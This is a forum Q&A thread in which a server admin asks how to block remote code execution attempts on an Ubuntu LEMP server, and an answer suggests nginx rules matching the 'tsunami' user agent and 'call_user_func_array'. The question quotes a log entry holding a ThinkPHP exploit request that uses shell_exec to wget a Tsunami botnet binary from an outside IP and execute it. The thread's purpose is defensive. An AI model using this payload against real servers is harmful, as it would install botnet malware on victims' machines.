Block Remote Code Execution Ubuntu Server Fail2Ban & Cloudflare

Question

Recently I figured out, that my Ubuntu (LEMP) server became a target for remote code execution attacks. In terms of access.log files it could looks like:

183.82.248.85 - - [06/Mar/2019:19:12:21 +0530] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://178.128.192.144/bins/Tsunami.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Tsunami/2.0"

I am using Failban, Cloudflare and CSF. I want to know, are there any other possibilities to block such attack by using fail2ban? If I managed to block such attacks I would block those IP's from CloudFlare WAF.

score 0 · Answer 1 · answered Mar 16 '19 at 21:10

Well, I do believe, that fail2ban is not a right way to solve the flood you described. Though, it has a way how to do it (see the article here).

I would like to say, that attacks like this one should has a very large pool of IPs. And blocking IPs, instead of blocking the behaviour pattern is not a complete solution.

For your specific case, you could continue with approach to block UserAgent and location patterns.

For example:

location / {
    if ($http_user_agent ~ (tsunami) ) {
        return 403;
    }
    if ($query_string ~ "call_user_func_array" ) {
        return 403;
    }
    ...
}

And I would like also suggest to make sure you do not have any worms and backdoors onboard your server (netstat -lntp for example will show any opened ports and services which uses them).

I think it's more useful blocking attacker by his attacking pattern. Because I can see that several attack patterns. Common similarities is download remote file by using 'wget' and execution. — Chathu, Mar 26 '19 at 03:59

Block Remote Code Execution Ubuntu Server Fail2Ban & Cloudflare

1 Answers1

Linked